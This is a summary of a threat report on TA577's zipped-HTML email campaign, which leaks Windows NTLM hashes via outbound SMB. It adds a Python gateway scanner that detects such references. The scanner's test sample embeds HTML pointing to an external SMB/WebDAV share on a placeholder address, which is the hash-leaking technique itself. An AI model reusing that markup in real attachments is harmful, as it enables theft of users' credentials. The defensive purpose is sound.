Proofpoint cybersecurity researchers have identified threat actor TA577 targeting organizations with rogue email attachments that steal Microsoft Windows NT LAN Manager (NTLM) authentication information.

Description

In a series of campaigns on February 26 and 27, 2024, tens of thousands of emails were sent as replies to previous messages, each carrying a zipped HTML attachment with a unique file hash [1]. The group aims to steal NTLM hashes for later password cracking or "Pass-the-Hash" attacks within the targeted organizations [1] [3]. Packaging the malicious HTML inside a zip archive helps the attachment slip past email security controls, which is what makes the campaign a significant threat [3]. When the HTML file is opened, the victim's machine connects to an external SMB server on which the researchers observed the open-source toolkit Impacket; the resulting NTLM authentication exchange exposes information such as the computer name and username together with the NTLM hash [2]. Disabling guest access to SMB does not prevent the attack, because the client still authenticates to the external server [2]. Organizations are advised to block outbound SMB and WebDAV connections to prevent the credential leakage seen in this campaign.
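The detection side of this can be scripted at the mail gateway: unpack each zipped HTML attachment and flag any member that references an SMB share or WebDAV path on a host outside the organization, since rendering such a reference is what causes the outbound NTLM authentication. The script below is an added example written for this summary; it is not Proofpoint's code and not a TA577 artifact. The reference patterns it matches (file:// URLs, \\host\share UNC paths, \\host@SSL WebDAV paths) and the ".corp.example" internal-domain suffix are the editor's assumptions, and the sample archive is constructed inline using a TEST-NET address.

```python
"""Flag zipped HTML attachments that reference external SMB/WebDAV resources.

Added example, not code from the report. Rendering an HTML page that points at
\\host\share or file://host/... makes a Windows client open an outbound SMB
(or WebDAV) session and authenticate with NTLM, which is the leak this
campaign relies on; the gateway check below looks for exactly those references.
"""
import io
import re
import zipfile

# Reference forms that trigger an outbound SMB/WebDAV session when rendered.
# Assumption: this pattern set is the editor's, not taken from the report.
PATTERNS = {
    "smb-file-url": re.compile(r"file:(?://|\\\\)([A-Za-z0-9.\-]+)", re.I),
    "smb-unc-path": re.compile(r"(?<![A-Za-z0-9:])\\\\([A-Za-z0-9.\-]+)\\"),
    "webdav-unc":   re.compile(r"\\\\([A-Za-z0-9.\-]+)@(?:SSL|\d+)", re.I),
}


def scan_html(text):
    """Return a list of (kind, host) hits found in one HTML document."""
    hits = []
    for kind, rx in PATTERNS.items():
        for m in rx.finditer(text):
            hits.append((kind, m.group(1).lower()))
    return hits


def scan_zip(data):
    """Scan every HTML member of a zip archive given as bytes.

    Returns {member_name: [(kind, host), ...]} for members that had hits.
    """
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".htm", ".html")):
                continue
            if info.file_size > 5_000_000:  # ignore decompression-bomb sized members
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            hits = scan_html(text)
            if hits:
                findings[info.filename] = hits
    return findings


def hosts_outside(findings, internal_suffixes=(".corp.example",)):
    """Referenced hosts that are not in the organization's own namespace.

    An attachment that makes a client authenticate to one of these is the
    behaviour described in the campaign; internal file-server links are normal.
    """
    out = set()
    for hits in findings.values():
        for _kind, host in hits:
            if not host.endswith(internal_suffixes):
                out.add(host)
    return sorted(out)


# Constructed sample (not a real TA577 attachment): one HTML page that references
# a share on a TEST-NET address in three forms plus a legitimate internal server.
SAMPLE_HTML = (
    '<html><body><p>Invoice</p>'
    '<img src="\\\\203.0.113.5\\share\\logo.png">'
    '<a href="file://203.0.113.5/share/doc.txt">open</a>'
    '<link rel="stylesheet" href="\\\\203.0.113.5@SSL\\DavWWWRoot\\s.css">'
    '<img src="\\\\fileserver.corp.example\\public\\banner.png">'
    '</body></html>'
)


def build_sample_zip():
    """Build the constructed attachment archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Reply_Document.html", SAMPLE_HTML)
        zf.writestr("readme.txt", "no references here")
    return buf.getvalue()


if __name__ == "__main__":
    findings = scan_zip(build_sample_zip())
    for name, hits in findings.items():
        print(name, hits)
    print("external hosts referenced:", hosts_outside(findings))
```

The scanner only reads the archive and never fetches the referenced resources, so running it at the gateway does not itself produce the outbound SMB connection. Because the report notes that disabling SMB guest access is not a mitigation, a hit on an external host should be treated as a block-and-alert event, paired with the outbound port 445 / WebDAV egress block the report recommends.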

Conclusion

This campaign highlights the importance of robust cybersecurity measures to protect against sophisticated threats like TA577. Organizations should take immediate steps to secure their systems by implementing strong authentication protocols, monitoring network traffic for suspicious activity, and regularly updating security software. By staying vigilant and proactive, businesses can mitigate the risks posed by malicious actors and safeguard their sensitive information.

References

[1] https://www.infosecurity-magazine.com/news/ta577-exploits-ntlm-authentication/
[2] https://www.proofpoint.com/us/blog/threat-insight/ta577s-unusual-attack-chain-leads-ntlm-data-theft
[3] https://techkranti.com/04-mar-24-in-security-news-today/